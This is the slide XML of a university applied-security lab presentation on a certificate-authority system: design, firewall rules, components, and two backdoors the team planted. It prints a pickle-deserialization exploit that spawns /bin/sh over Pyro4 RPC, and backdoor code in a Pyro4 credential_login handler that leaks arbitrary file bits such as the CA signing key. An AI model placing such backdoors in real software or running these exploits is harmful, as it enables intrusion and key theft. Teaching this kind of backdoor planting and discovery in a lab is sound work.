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2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png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0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28720" y="3963240"/>
            <a:ext cx="2704680" cy="2158200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="3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12400" y="3963240"/>
            <a:ext cx="2704680" cy="21582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7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28720" y="3963240"/>
            <a:ext cx="2704680" cy="2158200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="77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12400" y="3963240"/>
            <a:ext cx="2704680" cy="21582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Click to edit the title text formatMastertitelformat bearbeiten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12/11/13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A7BCED9-3369-4C53-8A3A-D674AF3949CB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de-DE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de-DE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de-DE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de-DE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de-DE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de-DE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de-DE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Click to edit the title text formatMastertitelformat bearbeiten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Seventh Outline LevelMastertextformat bearbeiten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de-DE" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Dritte Ebene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de-DE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Vierte Ebene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de-DE" sz="2000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12/11/13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533624B-B72B-48EE-9DF1-E5DC7C6E499E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Applied Security Laboratory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b8b8b"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Group 3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8b8b8b"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Gähwiler Marc, Helminger Leonhard, Zeindler Fabian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Backdoor 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229240" cy="5043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Compile a vulnerable core.py file of the Pyro4 RPC middleware into core.pyc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Vuln Pyro4 checks if called method = credential_login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Checks if username has certain prefix (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Extracts a filename from provided username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Uses password as offset n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Tries to read the nth bit of the provided file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If the bit is 0 returns a login error, successful login otherwise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Read any file that the core RPC application can read (CA signing key)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57200" y="548280"/>
            <a:ext cx="8229240" cy="5577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try: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if method.__name__ == "credential_login”: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if len(vargs) == 2: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    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user, password = vargs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    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if user.startswith("_BD:"):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        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filename = user[4:]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        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offset = bit_offset_calculation(int(password))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        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with file(filename, "rb") as f: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            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return get_bit(f, offset)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-&gt; PWND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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734400" y="1350720"/>
            <a:ext cx="2613600" cy="5778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Comparison</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026720" y="5320800"/>
            <a:ext cx="7555320" cy="14248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User data change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Backup/Logging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="103" name="Bild 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139320" y="2058840"/>
            <a:ext cx="5073120" cy="3285360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="104" name="Bild 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051520" y="1802880"/>
            <a:ext cx="3998520" cy="35413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Found backdoors</a:t>
            </a:r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XSS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rshell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08" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491040" y="1550880"/>
            <a:ext cx="1924560" cy="15534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9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NA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10" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509560" y="2125440"/>
            <a:ext cx="1924560" cy="15534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9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NA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3619080" y="3120480"/>
            <a:ext cx="1924560" cy="15534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9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NA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5905080" y="3235320"/>
            <a:ext cx="1924560" cy="15534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9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NA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6734160" y="4692240"/>
            <a:ext cx="1924560" cy="15534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9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NA</a:t>
            </a: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7" name="Inhaltsplatzhalter 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect b="29444" l="0" r="0" t="29444"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229240" cy="4525560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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BATMAN!!!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System design</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="81" name="Bild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09520" y="1417680"/>
            <a:ext cx="7058160" cy="529344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9" name="Inhaltsplatzhalter 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect b="1112" l="0" r="0" t="1112"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229240" cy="452556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System design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Introducing different trust zones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Security in depth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Least privilege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Assume external systems are insecure &amp; Isolate public access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Minimize exposure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System design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Review user data change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Binding user data &lt;-&gt; Certificate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User data change  breaks binding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CA should verify user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→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800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Review for user data change needed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Implementation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="87" name="Table 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1588320" y="2225880"/>
          <a:ext cx="6218640" cy="4322880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2389320"/>
                <a:gridCol w="1968120"/>
                <a:gridCol w="1861200"/>
              </a:tblGrid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Source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Protocol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Calibri"/>
                        </a:rPr>
                        <a:t>Destination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Webserver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HTTPS (443)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Internet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Internet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HTTPS (443)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Webserver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OpenVPN network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IPCop SSH (8022)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MainFirewall</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="6224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BackupServer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IPCop SSH (8022)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MainFirewall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OpenVPN network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SSH (22)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Backupserver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OpenVPN network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SSH (22)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CACore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OpenVPN network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SSH (22)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Webserver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Backupserver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SSH (22)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Webserver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Webserver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SSH (22)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CACore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CACore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SSH (22)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Webserver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8" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726840" y="1457640"/>
            <a:ext cx="2842200" cy="5778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Firewall rules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Implementation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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All traffic via SSH (Protect information while being processed, in transit, and in storage)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Backup/Logging (BCM, Accountability, Intrusion detection)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Local iptables (Security in depth)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Implementation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433160" y="210816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Webapplication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Python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Flask (CSRF, XSS)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nginx (DDOS, HTTPS)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RPC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via Pyro4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SSH tunnel (secrecy and integrity)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CA Core application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Python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pyOpenSSL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m2crypto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de-DE" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>SQLAlchemy (SQL injections)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3" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596160" y="1457640"/>
            <a:ext cx="4052160" cy="5778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Applications &amp; RPC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de-DE" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Backdoor 1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Status daemon (statusd)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Known vulnerability in python pickle marshaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t>-&gt;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 remote code execution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Direct access to the web and core server (port 4445 and 4446 )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class RunBinSh(object):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def __reduce__(self):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return (subprocess.Popen, (('/bin/sh', ),))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def main():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Pyro4.config.SERIALIZER = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>pickle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"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rpc = Pyro4.Proxy("PYRO:status@%s:%d" % (host, port))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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>print rpc.test(RunBinSh())</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>-&gt; PWND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